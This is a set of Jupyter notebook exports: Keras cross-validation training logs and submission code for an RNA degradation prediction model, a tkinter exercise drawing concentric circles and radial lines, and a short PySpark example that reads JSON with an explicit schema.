output_bg_ph_loss: 0.4657 - output_ph_loss: 0.7240 - output_mg_c_loss: 0.4719 - output_c_loss: 0.6699 - val_loss: 4.5072 - val_output_react_loss: 0.5356 - val_output_bg_ph_loss: 0.6314 - val_output_ph_loss: 0.5929 - val_output_mg_c_loss: 0.5335 - val_output_c_loss: 0.5132 Epoch 43/70 120/120 - 7s - loss: 4.0446 - output_react_loss: 0.4416 - output_bg_ph_loss: 0.4594 - output_ph_loss: 0.6716 - output_mg_c_loss: 0.4668 - output_c_loss: 0.6375 - val_loss: 4.5044 - val_output_react_loss: 0.5355 - val_output_bg_ph_loss: 0.6309 - val_output_ph_loss: 0.5925 - val_output_mg_c_loss: 0.5328 - val_output_c_loss: 0.5135 Epoch 44/70 120/120 - 7s - loss: 4.1571 - output_react_loss: 0.4519 - output_bg_ph_loss: 0.4633 - output_ph_loss: 0.7157 - output_mg_c_loss: 0.4768 - output_c_loss: 0.6574 - val_loss: 4.5038 - val_output_react_loss: 0.5351 - val_output_bg_ph_loss: 0.6309 - val_output_ph_loss: 0.5927 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5129 Epoch 45/70 120/120 - 7s - loss: 4.1190 - output_react_loss: 0.4399 - output_bg_ph_loss: 0.4596 - output_ph_loss: 0.7120 - output_mg_c_loss: 0.4726 - output_c_loss: 0.6628 - val_loss: 4.5050 - val_output_react_loss: 0.5356 - val_output_bg_ph_loss: 0.6307 - val_output_ph_loss: 0.5928 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5133 Epoch 46/70 120/120 - 7s - loss: 4.1904 - output_react_loss: 0.4496 - output_bg_ph_loss: 0.4695 - output_ph_loss: 0.7201 - output_mg_c_loss: 0.4816 - output_c_loss: 0.6688 - val_loss: 4.5056 - val_output_react_loss: 0.5357 - val_output_bg_ph_loss: 0.6312 - val_output_ph_loss: 0.5926 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5127 Epoch 47/70 120/120 - 7s - loss: 4.2432 - output_react_loss: 0.4606 - output_bg_ph_loss: 0.4745 - output_ph_loss: 0.7277 - output_mg_c_loss: 0.4862 - output_c_loss: 
0.6731 - val_loss: 4.5064 - val_output_react_loss: 0.5358 - val_output_bg_ph_loss: 0.6310 - val_output_ph_loss: 0.5928 - val_output_mg_c_loss: 0.5336 - val_output_c_loss: 0.5129 Epoch 48/70 120/120 - 7s - loss: 3.9354 - output_react_loss: 0.4218 - output_bg_ph_loss: 0.4448 - output_ph_loss: 0.6639 - output_mg_c_loss: 0.4552 - output_c_loss: 0.6279 - val_loss: 4.5060 - val_output_react_loss: 0.5354 - val_output_bg_ph_loss: 0.6312 - val_output_ph_loss: 0.5927 - val_output_mg_c_loss: 0.5332 - val_output_c_loss: 0.5136 Epoch 49/70 Epoch 00049: ReduceLROnPlateau reducing learning rate to 1.0000000656873453e-06. 120/120 - 7s - loss: 4.1410 - output_react_loss: 0.4473 - output_bg_ph_loss: 0.4629 - output_ph_loss: 0.7069 - output_mg_c_loss: 0.4758 - output_c_loss: 0.6621 - val_loss: 4.5057 - val_output_react_loss: 0.5359 - val_output_bg_ph_loss: 0.6311 - val_output_ph_loss: 0.5930 - val_output_mg_c_loss: 0.5329 - val_output_c_loss: 0.5130 Epoch 50/70 120/120 - 7s - loss: 4.0535 - output_react_loss: 0.4465 - output_bg_ph_loss: 0.4524 - output_ph_loss: 0.6915 - output_mg_c_loss: 0.4633 - output_c_loss: 0.6376 - val_loss: 4.5066 - val_output_react_loss: 0.5359 - val_output_bg_ph_loss: 0.6312 - val_output_ph_loss: 0.5930 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5132 Epoch 51/70 120/120 - 7s - loss: 4.1506 - output_react_loss: 0.4464 - output_bg_ph_loss: 0.4638 - output_ph_loss: 0.7097 - output_mg_c_loss: 0.4765 - output_c_loss: 0.6675 - val_loss: 4.5061 - val_output_react_loss: 0.5357 - val_output_bg_ph_loss: 0.6311 - val_output_ph_loss: 0.5930 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5133 Epoch 52/70 120/120 - 7s - loss: 4.1188 - output_react_loss: 0.4439 - output_bg_ph_loss: 0.4648 - output_ph_loss: 0.6971 - output_mg_c_loss: 0.4718 - output_c_loss: 0.6607 - val_loss: 4.5057 - val_output_react_loss: 0.5356 - val_output_bg_ph_loss: 0.6311 - val_output_ph_loss: 0.5930 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5132 Epoch 53/70 120/120 - 7s - loss: 4.1722 - output_react_loss: 0.4500 - output_bg_ph_loss: 0.4646 - output_ph_loss: 0.7128 - output_mg_c_loss: 0.4809 - output_c_loss: 0.6685 - val_loss: 4.5053 - val_output_react_loss: 0.5355 - val_output_bg_ph_loss: 0.6310 - val_output_ph_loss: 0.5929 - val_output_mg_c_loss: 0.5331 - val_output_c_loss: 0.5132 Epoch 54/70 Restoring model weights from the end of the best epoch. Epoch 00054: ReduceLROnPlateau reducing learning rate to 1.0000001111620805e-07. 
120/120 - 7s - loss: 4.1012 - output_react_loss: 0.4457 - output_bg_ph_loss: 0.4583 - output_ph_loss: 0.7053 - output_mg_c_loss: 0.4713 - output_c_loss: 0.6452 - val_loss: 4.5060 - val_output_react_loss: 0.5355 - val_output_bg_ph_loss: 0.6311 - val_output_ph_loss: 0.5930 - val_output_mg_c_loss: 0.5333 - val_output_c_loss: 0.5132 Epoch 00054: early stopping FOLD: 5 Epoch 1/70 120/120 - 9s - loss: 8.9648 - output_react_loss: 0.9398 - output_bg_ph_loss: 1.1487 - output_ph_loss: 1.3266 - output_mg_c_loss: 1.1680 - output_c_loss: 1.1252 - val_loss: 6.6904 - val_output_react_loss: 0.7636 - val_output_bg_ph_loss: 0.9520 - val_output_ph_loss: 0.8665 - val_output_mg_c_loss: 0.8282 - val_output_c_loss: 0.7363 Epoch 2/70 120/120 - 7s - loss: 7.6799 - output_react_loss: 0.8094 - output_bg_ph_loss: 0.9836 - output_ph_loss: 1.1459 - output_mg_c_loss: 0.9768 - output_c_loss: 0.9945 - val_loss: 6.0158 - val_output_react_loss: 0.7012 - val_output_bg_ph_loss: 0.8336 - val_output_ph_loss: 0.7948 - val_output_mg_c_loss: 0.7338 - val_output_c_loss: 0.6837 Epoch 3/70 120/120 - 7s - loss: 7.2897 - output_react_loss: 0.7810 - output_bg_ph_loss: 0.9158 - output_ph_loss: 1.1226 - output_mg_c_loss: 0.9056 - output_c_loss: 0.9623 - val_loss: 5.5349 - val_output_react_loss: 0.6677 - val_output_bg_ph_loss: 0.7701 - val_output_ph_loss: 0.7270 - val_output_mg_c_loss: 0.6577 - val_output_c_loss: 0.6171 Epoch 4/70 120/120 - 7s - loss: 6.7767 - output_react_loss: 0.7432 - output_bg_ph_loss: 0.8430 - output_ph_loss: 1.0224 - output_mg_c_loss: 0.8412 - output_c_loss: 0.8995 - val_loss: 5.2177 - val_output_react_loss: 0.6327 - val_output_bg_ph_loss: 0.7224 - val_output_ph_loss: 0.6922 - val_output_mg_c_loss: 0.6148 - val_output_c_loss: 0.5860 Epoch 5/70 120/120 - 7s - loss: 6.5807 - output_react_loss: 0.7253 - output_bg_ph_loss: 0.8228 - output_ph_loss: 1.0071 - output_mg_c_loss: 0.8073 - output_c_loss: 0.8630 - val_loss: 5.0784 - val_output_react_loss: 0.6096 - val_output_bg_ph_loss: 0.7026 - val_output_ph_loss: 0.6803 - val_output_mg_c_loss: 0.5995 - val_output_c_loss: 0.5747 Epoch 6/70 120/120 - 7s - loss: 6.3022 - output_react_loss: 0.6965 - output_bg_ph_loss: 0.7873 - output_ph_loss: 0.9594 - output_mg_c_loss: 0.7747 - output_c_loss: 0.8259 - val_loss: 4.9445 - val_output_react_loss: 0.5908 - val_output_bg_ph_loss: 0.6836 - val_output_ph_loss: 0.6573 - val_output_mg_c_loss: 0.5859 - val_output_c_loss: 0.5667 Epoch 7/70 120/120 - 8s - loss: 6.1569 - output_react_loss: 0.6795 - output_bg_ph_loss: 0.7661 - output_ph_loss: 0.9470 - output_mg_c_loss: 0.7474 - output_c_loss: 0.8241 - val_loss: 4.9766 - val_output_react_loss: 0.5834 - val_output_bg_ph_loss: 0.7018 - val_output_ph_loss: 0.6614 - val_output_mg_c_loss: 0.5918 - val_output_c_loss: 0.5612 Epoch 8/70 120/120 - 7s - loss: 6.1745 - output_react_loss: 0.6824 - output_bg_ph_loss: 0.7600 - output_ph_loss: 0.9654 - output_mg_c_loss: 0.7405 - output_c_loss: 0.8432 - val_loss: 4.8558 - val_output_react_loss: 0.5759 - val_output_bg_ph_loss: 0.6690 - val_output_ph_loss: 0.6489 - val_output_mg_c_loss: 0.5753 - val_output_c_loss: 0.5665 Epoch 9/70 120/120 - 7s - loss: 5.7238 - output_react_loss: 0.6377 - output_bg_ph_loss: 0.7138 - output_ph_loss: 0.8751 - output_mg_c_loss: 0.6886 - output_c_loss: 0.7685 - val_loss: 4.8555 - val_output_react_loss: 0.5673 - val_output_bg_ph_loss: 0.6788 - val_output_ph_loss: 0.6493 - val_output_mg_c_loss: 0.5792 - val_output_c_loss: 0.5556 Epoch 10/70 120/120 - 7s - loss: 5.7590 - output_react_loss: 0.6336 - output_bg_ph_loss: 0.7089 - 
output_ph_loss: 0.8894 - output_mg_c_loss: 0.6956 - output_c_loss: 0.7936 - val_loss: 4.7163 - val_output_react_loss: 0.5526 - val_output_bg_ph_loss: 0.6563 - val_output_ph_loss: 0.6365 - val_output_mg_c_loss: 0.5557 - val_output_c_loss: 0.5506 Epoch 11/70 120/120 - 7s - loss: 5.5815 - output_react_loss: 0.6273 - output_bg_ph_loss: 0.6864 - output_ph_loss: 0.8704 - output_mg_c_loss: 0.6616 - output_c_loss: 0.7606 - val_loss: 4.6844 - val_output_react_loss: 0.5585 - val_output_bg_ph_loss: 0.6507 - val_output_ph_loss: 0.6214 - val_output_mg_c_loss: 0.5499 - val_output_c_loss: 0.5449 Epoch 12/70 120/120 - 7s - loss: 5.4826 - output_react_loss: 0.6173 - output_bg_ph_loss: 0.6596 - output_ph_loss: 0.8529 - output_mg_c_loss: 0.6578 - output_c_loss: 0.7603 - val_loss: 4.6554 - val_output_react_loss: 0.5450 - val_output_bg_ph_loss: 0.6512 - val_output_ph_loss: 0.6174 - val_output_mg_c_loss: 0.5547 - val_output_c_loss: 0.5363 Epoch 13/70 120/120 - 7s - loss: 5.3332 - output_react_loss: 0.5912 - output_bg_ph_loss: 0.6540 - output_ph_loss: 0.8383 - output_mg_c_loss: 0.6354 - output_c_loss: 0.7337 - val_loss: 4.6316 - val_output_react_loss: 0.5492 - val_output_bg_ph_loss: 0.6412 - val_output_ph_loss: 0.6162 - val_output_mg_c_loss: 0.5516 - val_output_c_loss: 0.5314 Epoch 14/70 120/120 - 8s - loss: 5.3117 - output_react_loss: 0.5859 - output_bg_ph_loss: 0.6470 - output_ph_loss: 0.8433 - output_mg_c_loss: 0.6317 - output_c_loss: 0.7391 - val_loss: 4.5633 - val_output_react_loss: 0.5350 - val_output_bg_ph_loss: 0.6353 - val_output_ph_loss: 0.6074 - val_output_mg_c_loss: 0.5415 - val_output_c_loss: 0.5322 Epoch 15/70 120/120 - 8s - loss: 5.3218 - output_react_loss: 0.5974 - output_bg_ph_loss: 0.6333 - output_ph_loss: 0.8453 - output_mg_c_loss: 0.6272 - output_c_loss: 0.7607 - val_loss: 4.6204 - val_output_react_loss: 0.5386 - val_output_bg_ph_loss: 0.6468 - val_output_ph_loss: 0.6139 - val_output_mg_c_loss: 0.5522 - val_output_c_loss: 0.5313 Epoch 16/70 120/120 - 7s - loss: 5.2437 - output_react_loss: 0.5836 - output_bg_ph_loss: 0.6251 - output_ph_loss: 0.8358 - output_mg_c_loss: 0.6188 - output_c_loss: 0.7528 - val_loss: 4.5869 - val_output_react_loss: 0.5374 - val_output_bg_ph_loss: 0.6370 - val_output_ph_loss: 0.6171 - val_output_mg_c_loss: 0.5449 - val_output_c_loss: 0.5311 Epoch 17/70 120/120 - 7s - loss: 5.0213 - output_react_loss: 0.5595 - output_bg_ph_loss: 0.5995 - output_ph_loss: 0.8040 - output_mg_c_loss: 0.5927 - output_c_loss: 0.7138 - val_loss: 4.5759 - val_output_react_loss: 0.5357 - val_output_bg_ph_loss: 0.6397 - val_output_ph_loss: 0.6064 - val_output_mg_c_loss: 0.5432 - val_output_c_loss: 0.5324 Epoch 18/70 120/120 - 7s - loss: 4.8916 - output_react_loss: 0.5412 - output_bg_ph_loss: 0.5869 - output_ph_loss: 0.7755 - output_mg_c_loss: 0.5758 - output_c_loss: 0.7082 - val_loss: 4.5692 - val_output_react_loss: 0.5379 - val_output_bg_ph_loss: 0.6415 - val_output_ph_loss: 0.6044 - val_output_mg_c_loss: 0.5391 - val_output_c_loss: 0.5278 Epoch 19/70 Epoch 00019: ReduceLROnPlateau reducing learning rate to 0.00010000000474974513. 
120/120 - 7s - loss: 4.8882 - output_react_loss: 0.5382 - output_bg_ph_loss: 0.5824 - output_ph_loss: 0.7907 - output_mg_c_loss: 0.5734 - output_c_loss: 0.7095 - val_loss: 4.5903 - val_output_react_loss: 0.5373 - val_output_bg_ph_loss: 0.6393 - val_output_ph_loss: 0.6124 - val_output_mg_c_loss: 0.5453 - val_output_c_loss: 0.5340 Epoch 20/70 120/120 - 7s - loss: 4.7543 - output_react_loss: 0.5258 - output_bg_ph_loss: 0.5629 - output_ph_loss: 0.7631 - output_mg_c_loss: 0.5556 - output_c_loss: 0.7027 - val_loss: 4.4704 - val_output_react_loss: 0.5217 - val_output_bg_ph_loss: 0.6260 - val_output_ph_loss: 0.5967 - val_output_mg_c_loss: 0.5295 - val_output_c_loss: 0.5194 Epoch 21/70 120/120 - 7s - loss: 4.6307 - output_react_loss: 0.5109 - output_bg_ph_loss: 0.5473 - output_ph_loss: 0.7462 - output_mg_c_loss: 0.5416 - output_c_loss: 0.6850 - val_loss: 4.4541 - val_output_react_loss: 0.5213 - val_output_bg_ph_loss: 0.6222 - val_output_ph_loss: 0.5931 - val_output_mg_c_loss: 0.5274 - val_output_c_loss: 0.5190 Epoch 22/70 120/120 - 7s - loss: 4.7757 - output_react_loss: 0.5252 - output_bg_ph_loss: 0.5555 - output_ph_loss: 0.7932 - output_mg_c_loss: 0.5553 - output_c_loss: 0.7104 - val_loss: 4.4514 - val_output_react_loss: 0.5215 - val_output_bg_ph_loss: 0.6220 - val_output_ph_loss: 0.5926 - val_output_mg_c_loss: 0.5263 - val_output_c_loss: 0.5191 Epoch 23/70 120/120 - 8s - loss: 4.6922 - output_react_loss: 0.5121 - output_bg_ph_loss: 0.5512 - output_ph_loss: 0.7699 - output_mg_c_loss: 0.5475 - output_c_loss: 0.7008 - val_loss: 4.4529 - val_output_react_loss: 0.5212 - val_output_bg_ph_loss: 0.6217 - val_output_ph_loss: 0.5935 - val_output_mg_c_loss: 0.5273 - val_output_c_loss: 0.5190 Epoch 24/70 120/120 - 7s - loss: 4.7715 - output_react_loss: 0.5251 - output_bg_ph_loss: 0.5536 - output_ph_loss: 0.7821 - output_mg_c_loss: 0.5579 - output_c_loss: 0.7160 - val_loss: 4.4516 - val_output_react_loss: 0.5199 - val_output_bg_ph_loss: 0.6236 - val_output_ph_loss: 0.5938 - val_output_mg_c_loss: 0.5260 - val_output_c_loss: 0.5187 Epoch 25/70 120/120 - 7s - loss: 4.4517 - output_react_loss: 0.4876 - output_bg_ph_loss: 0.5274 - output_ph_loss: 0.7290 - output_mg_c_loss: 0.5185 - output_c_loss: 0.6555 - val_loss: 4.4539 - val_output_react_loss: 0.5215 - val_output_bg_ph_loss: 0.6226 - val_output_ph_loss: 0.5915 - val_output_mg_c_loss: 0.5279 - val_output_c_loss: 0.5184 Epoch 26/70 120/120 - 7s - loss: 4.6458 - output_react_loss: 0.5124 - output_bg_ph_loss: 0.5382 - output_ph_loss: 0.7634 - output_mg_c_loss: 0.5398 - output_c_loss: 0.7015 - val_loss: 4.4547 - val_output_react_loss: 0.5210 - val_output_bg_ph_loss: 0.6227 - val_output_ph_loss: 0.5934 - val_output_mg_c_loss: 0.5278 - val_output_c_loss: 0.5182 Epoch 27/70 120/120 - 7s - loss: 4.5106 - output_react_loss: 0.4968 - output_bg_ph_loss: 0.5324 - output_ph_loss: 0.7305 - output_mg_c_loss: 0.5255 - output_c_loss: 0.6708 - val_loss: 4.4500 - val_output_react_loss: 0.5203 - val_output_bg_ph_loss: 0.6214 - val_output_ph_loss: 0.5913 - val_output_mg_c_loss: 0.5281 - val_output_c_loss: 0.5190 Epoch 28/70 120/120 - 7s - loss: 4.6403 - output_react_loss: 0.5107 - output_bg_ph_loss: 0.5368 - output_ph_loss: 0.7640 - output_mg_c_loss: 0.5427 - output_c_loss: 0.6960 - val_loss: 4.4483 - val_output_react_loss: 0.5201 - val_output_bg_ph_loss: 0.6215 - val_output_ph_loss: 0.5918 - val_output_mg_c_loss: 0.5270 - val_output_c_loss: 0.5192 Epoch 29/70 120/120 - 7s - loss: 4.4913 - output_react_loss: 0.4889 - output_bg_ph_loss: 0.5276 - output_ph_loss: 0.7353 - 
output_mg_c_loss: 0.5262 - output_c_loss: 0.6706 - val_loss: 4.4535 - val_output_react_loss: 0.5199 - val_output_bg_ph_loss: 0.6213 - val_output_ph_loss: 0.5946 - val_output_mg_c_loss: 0.5287 - val_output_c_loss: 0.5192 Epoch 30/70 120/120 - 7s - loss: 4.5325 - output_react_loss: 0.4932 - output_bg_ph_loss: 0.5301 - output_ph_loss: 0.7476 - output_mg_c_loss: 0.5284 - output_c_loss: 0.6813 - val_loss: 4.4534 - val_output_react_loss: 0.5200 - val_output_bg_ph_loss: 0.6227 - val_output_ph_loss: 0.5932 - val_output_mg_c_loss: 0.5280 - val_output_c_loss: 0.5190 Epoch 31/70 120/120 - 7s - loss: 4.6655 - output_react_loss: 0.5160 - output_bg_ph_loss: 0.5454 - output_ph_loss: 0.7764 - output_mg_c_loss: 0.5364 - output_c_loss: 0.6935 - val_loss: 4.4497 - val_output_react_loss: 0.5211 - val_output_bg_ph_loss: 0.6212 - val_output_ph_loss: 0.5921 - val_output_mg_c_loss: 0.5267 - val_output_c_loss: 0.5194 Epoch 32/70 120/120 - 7s - loss: 4.5931 - output_react_loss: 0.4959 - output_bg_ph_loss: 0.5323 - output_ph_loss: 0.7595 - output_mg_c_loss: 0.5395 - output_c_loss: 0.6981 - val_loss: 4.4446 - val_output_react_loss: 0.5206 - val_output_bg_ph_loss: 0.6205 - val_output_ph_loss: 0.5926 - val_output_mg_c_loss: 0.5264 - val_output_c_loss: 0.5169 Epoch 33/70 120/120 - 7s - loss: 4.3964 - output_react_loss: 0.4823 - output_bg_ph_loss: 0.5141 - output_ph_loss: 0.7203 - output_mg_c_loss: 0.5127 - output_c_loss: 0.6580 - val_loss: 4.4553 - val_output_react_loss: 0.5209 - val_output_bg_ph_loss: 0.6214 - val_output_ph_loss: 0.5944 - val_output_mg_c_loss: 0.5288 - val_output_c_loss: 0.5187 Epoch 34/70 120/120 - 7s - loss: 4.4073 - output_react_loss: 0.4855 - output_bg_ph_loss: 0.5156 - output_ph_loss: 0.7207 - output_mg_c_loss: 0.5123 - output_c_loss: 0.6599 - val_loss: 4.4478 - val_output_react_loss: 0.5195 - val_output_bg_ph_loss: 0.6226 - val_output_ph_loss: 0.5909 - val_output_mg_c_loss: 0.5271 - val_output_c_loss: 0.5185 Epoch 35/70 120/120 - 7s - loss: 4.5178 - output_react_loss: 0.4913 - output_bg_ph_loss: 0.5249 - output_ph_loss: 0.7517 - output_mg_c_loss: 0.5276 - output_c_loss: 0.6785 - val_loss: 4.4527 - val_output_react_loss: 0.5213 - val_output_bg_ph_loss: 0.6228 - val_output_ph_loss: 0.5934 - val_output_mg_c_loss: 0.5263 - val_output_c_loss: 0.5185 Epoch 36/70 120/120 - 7s - loss: 4.4502 - output_react_loss: 0.4907 - output_bg_ph_loss: 0.5147 - output_ph_loss: 0.7224 - output_mg_c_loss: 0.5196 - output_c_loss: 0.6778 - val_loss: 4.4616 - val_output_react_loss: 0.5224 - val_output_bg_ph_loss: 0.6234 - val_output_ph_loss: 0.5936 - val_output_mg_c_loss: 0.5286 - val_output_c_loss: 0.5192 Epoch 37/70 120/120 - 7s - loss: 4.5019 - output_react_loss: 0.4848 - output_bg_ph_loss: 0.5232 - output_ph_loss: 0.7487 - output_mg_c_loss: 0.5269 - output_c_loss: 0.6834 - val_loss: 4.4388 - val_output_react_loss: 0.5192 - val_output_bg_ph_loss: 0.6203 - val_output_ph_loss: 0.5906 - val_output_mg_c_loss: 0.5255 - val_output_c_loss: 0.5183 Epoch 38/70 120/120 - 7s - loss: 4.6008 - output_react_loss: 0.4989 - output_bg_ph_loss: 0.5318 - output_ph_loss: 0.7743 - output_mg_c_loss: 0.5331 - output_c_loss: 0.6988 - val_loss: 4.4428 - val_output_react_loss: 0.5200 - val_output_bg_ph_loss: 0.6201 - val_output_ph_loss: 0.5913 - val_output_mg_c_loss: 0.5270 - val_output_c_loss: 0.5173 Epoch 39/70 120/120 - 7s - loss: 4.4832 - output_react_loss: 0.4915 - output_bg_ph_loss: 0.5185 - output_ph_loss: 0.7407 - output_mg_c_loss: 0.5242 - output_c_loss: 0.6742 - val_loss: 4.4557 - val_output_react_loss: 0.5196 - val_output_bg_ph_loss: 
0.6228 - val_output_ph_loss: 0.5949 - val_output_mg_c_loss: 0.5282 - val_output_c_loss: 0.5195 Epoch 40/70 120/120 - 7s - loss: 4.3365 - output_react_loss: 0.4731 - output_bg_ph_loss: 0.5059 - output_ph_loss: 0.7114 - output_mg_c_loss: 0.5005 - output_c_loss: 0.6661 - val_loss: 4.4675 - val_output_react_loss: 0.5215 - val_output_bg_ph_loss: 0.6240 - val_output_ph_loss: 0.5943 - val_output_mg_c_loss: 0.5309 - val_output_c_loss: 0.5204 Epoch 41/70 120/120 - 7s - loss: 4.4591 - output_react_loss: 0.4814 - output_bg_ph_loss: 0.5189 - output_ph_loss: 0.7371 - output_mg_c_loss: 0.5184 - output_c_loss: 0.6846 - val_loss: 4.4509 - val_output_react_loss: 0.5202 - val_output_bg_ph_loss: 0.6215 - val_output_ph_loss: 0.5925 - val_output_mg_c_loss: 0.5280 - val_output_c_loss: 0.5189 Epoch 42/70 Epoch 00042: ReduceLROnPlateau reducing learning rate to 1.0000000474974514e-05. 120/120 - 7s - loss: 4.4446 - output_react_loss: 0.4837 - output_bg_ph_loss: 0.5138 - output_ph_loss: 0.7438 - output_mg_c_loss: 0.5199 - output_c_loss: 0.6659 - val_loss: 4.4508 - val_output_react_loss: 0.5199 - val_output_bg_ph_loss: 0.6217 - val_output_ph_loss: 0.5920 - val_output_mg_c_loss: 0.5283 - val_output_c_loss: 0.5190 Epoch 43/70 120/120 - 7s - loss: 4.3063 - output_react_loss: 0.4751 - output_bg_ph_loss: 0.4987 - output_ph_loss: 0.7046 - output_mg_c_loss: 0.4995 - output_c_loss: 0.6551 - val_loss: 4.4425 - val_output_react_loss: 0.5194 - val_output_bg_ph_loss: 0.6206 - val_output_ph_loss: 0.5911 - val_output_mg_c_loss: 0.5265 - val_output_c_loss: 0.5182 Epoch 44/70 120/120 - 7s - loss: 4.4064 - output_react_loss: 0.4764 - output_bg_ph_loss: 0.5094 - output_ph_loss: 0.7278 - output_mg_c_loss: 0.5196 - output_c_loss: 0.6679 - val_loss: 4.4411 - val_output_react_loss: 0.5194 - val_output_bg_ph_loss: 0.6206 - val_output_ph_loss: 0.5908 - val_output_mg_c_loss: 0.5261 - val_output_c_loss: 0.5180 Epoch 45/70 120/120 - 7s - loss: 4.4373 - output_react_loss: 0.4823 - output_bg_ph_loss: 0.5169 - output_ph_loss: 0.7386 - output_mg_c_loss: 0.5150 - output_c_loss: 0.6702 - val_loss: 4.4420 - val_output_react_loss: 0.5194 - val_output_bg_ph_loss: 0.6208 - val_output_ph_loss: 0.5907 - val_output_mg_c_loss: 0.5264 - val_output_c_loss: 0.5180 Epoch 46/70 120/120 - 7s - loss: 4.4963 - output_react_loss: 0.4870 - output_bg_ph_loss: 0.5140 - output_ph_loss: 0.7410 - output_mg_c_loss: 0.5299 - output_c_loss: 0.6936 - val_loss: 4.4415 - val_output_react_loss: 0.5199 - val_output_bg_ph_loss: 0.6206 - val_output_ph_loss: 0.5905 - val_output_mg_c_loss: 0.5261 - val_output_c_loss: 0.5178 Epoch 47/70 Restoring model weights from the end of the best epoch. Epoch 00047: ReduceLROnPlateau reducing learning rate to 1.0000000656873453e-06. 
120/120 - 8s - loss: 4.4492 - output_react_loss: 0.4823 - output_bg_ph_loss: 0.5137 - output_ph_loss: 0.7492 - output_mg_c_loss: 0.5126 - output_c_loss: 0.6827 - val_loss: 4.4389 - val_output_react_loss: 0.5192 - val_output_bg_ph_loss: 0.6203 - val_output_ph_loss: 0.5904 - val_output_mg_c_loss: 0.5258 - val_output_c_loss: 0.5177
Epoch 00047: early stopping
###Markdown
Model loss graph
###Code
for fold, history in enumerate(history_list):
    print(f'\nFOLD: {fold+1}')
    min_valid_idx = np.array(history['val_loss']).argmin()
    print(f"Train {np.array(history['loss'])[min_valid_idx]:.5f} Validation {np.array(history['val_loss'])[min_valid_idx]:.5f}")

plot_metrics_agg(history_list)
###Output
FOLD: 1
Train 4.08940 Validation 4.55253

FOLD: 2
Train 3.78819 Validation 4.34760

FOLD: 3
Train 4.06594 Validation 4.46747

FOLD: 4
Train 4.15711 Validation 4.50378

FOLD: 5
Train 4.50192 Validation 4.43876
###Markdown
Post-processing
###Code
# Assign preds to OOF set
for idx, col in enumerate(pred_cols):
    val = oof_preds[:, :, idx]
    oof = oof.assign(**{f'{col}_pred': list(val)})

oof.to_csv('oof.csv', index=False)

# Build a dict of OOF predictions, one entry per target column
oof_preds_dict = {}
for idx, col in enumerate(pred_cols):
    oof_preds_dict[col] = oof_preds[:, :, idx]

# Assign values to test set
preds_ls = []
for df, preds in [(public_test, test_public_preds), (private_test, test_private_preds)]:
    for i, uid in enumerate(df.id):
        single_pred = preds[i]
        single_df = pd.DataFrame(single_pred, columns=pred_cols)
        single_df['id_seqpos'] = [f'{uid}_{x}' for x in range(single_df.shape[0])]
        preds_ls.append(single_df)

preds_df = pd.concat(preds_ls)
###Output
_____no_output_____
###Markdown
Model evaluation
###Code
y_true_dict = get_targets_dict(train, pred_cols, train.index)
y_true = np.array([y_true_dict[col] for col in pred_cols]).transpose((1, 2, 0, 3)).reshape(oof_preds.shape)

display(evaluate_model(train, y_true, oof_preds, pred_cols))
display(evaluate_model(train, y_true, oof_preds, pred_cols, use_cols=['reactivity', 'deg_Mg_pH10', 'deg_Mg_50C']))
###Output
_____no_output_____
###Markdown
Visualize test predictions
###Code
submission = pd.read_csv(database_base_path + 'sample_submission.csv')
submission = submission[['id_seqpos']].merge(preds_df, on=['id_seqpos'])
###Output
_____no_output_____
###Markdown
Test set predictions
###Code
display(submission.head(10))
display(submission.describe())
submission.to_csv('submission.csv', index=False)
###Output
_____no_output_____
Python3/Anaconda-Jupyter/Python181103-059.ipynb
###Markdown
Problem: drawing, a comprehensive example.
Program analysis: use tkinter's Canvas to draw a set of concentric circles, then use nested for loops to sweep a fan of radial lines around the center. Source code:
###Code
#!/usr/bin/python
# -*- coding: UTF-8 -*-

if __name__ == '__main__':
    from tkinter import *

    canvas = Canvas(width = 300, height = 300, bg = 'green')
    canvas.pack(expand = YES, fill = BOTH)

    # Concentric circles around the center (x0, y0)
    x0 = 150
    y0 = 100
    canvas.create_oval(x0 - 10, y0 - 10, x0 + 10, y0 + 10)
    canvas.create_oval(x0 - 20, y0 - 20, x0 + 20, y0 + 20)
    canvas.create_oval(x0 - 50, y0 - 50, x0 + 50, y0 + 50)

    import math
    B = 0.809  # vertical squash factor: flattens the circle into an ellipse

    # 16 radial lines, evenly spaced around the center
    for i in range(16):
        a = 2 * math.pi / 16 * i
        x = math.ceil(x0 + 48 * math.cos(a))
        y = math.ceil(y0 + 48 * math.sin(a) * B)
        canvas.create_line(x0, y0, x, y, fill = 'red')
    canvas.create_oval(x0 - 60, y0 - 60, x0 + 60, y0 + 60)

    # Sweep the fan of lines around the center, one degree per step of k
    for k in range(501):
        for i in range(17):
            a = (2 * math.pi / 16) * i + (2 * math.pi / 180) * k
            x = math.ceil(x0 + 48 * math.cos(a))
            y = math.ceil(y0 + 48 * math.sin(a) * B)
            canvas.create_line(x0, y0, x, y, fill = 'red')
        # Redraw at a slight phase offset (kept from the original exercise)
        for j in range(51):
            a = (2 * math.pi / 16) * i + (2 * math.pi / 180) * k - 1
            x = math.ceil(x0 + 48 * math.cos(a))
            y = math.ceil(y0 + 48 * math.sin(a) * B)
            canvas.create_line(x0, y0, x, y, fill = 'red')

    mainloop()
###Output
_____no_output_____
Spark_DataSets/PySpark_DataSets/01_spark_basics_schema.ipynb
###Markdown
Creating the schema
###Code
# Imports needed for this cell to run on its own (the SparkSession is
# presumably created in an earlier cell of the original notebook)
from pyspark.sql import SparkSession
from pyspark.sql.types import StructType, StructField, StringType, IntegerType

spark = SparkSession.builder.appName("spark_basics_schema").getOrCreate()

schema = StructType([StructField("name", StringType(), True),
                     StructField("grade", IntegerType(), True)])

df = spark.read.json("datasets/student.json", schema=schema)
df.printSchema()
df.describe().show()
###Output
+-------+-----+-----------------+
|summary| name|            grade|
+-------+-----+-----------------+
|  count|    3|                3|
|   mean| null|6.666666666666667|
| stddev| null|2.516611478423583|
|    min| Jonh|                4|
|    max|Peter|                9|
+-------+-----+-----------------+
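###Markdown
Since Spark 2.3 the same schema can also be declared as a DDL-formatted string, which is often more compact. A small sketch, assuming the same `spark` session and JSON file as above (`df_ddl` is an illustrative name):
###Code
# Equivalent schema declared as a DDL string instead of StructType objects
df_ddl = spark.read.schema("name STRING, grade INT").json("datasets/student.json")
df_ddl.printSchema()
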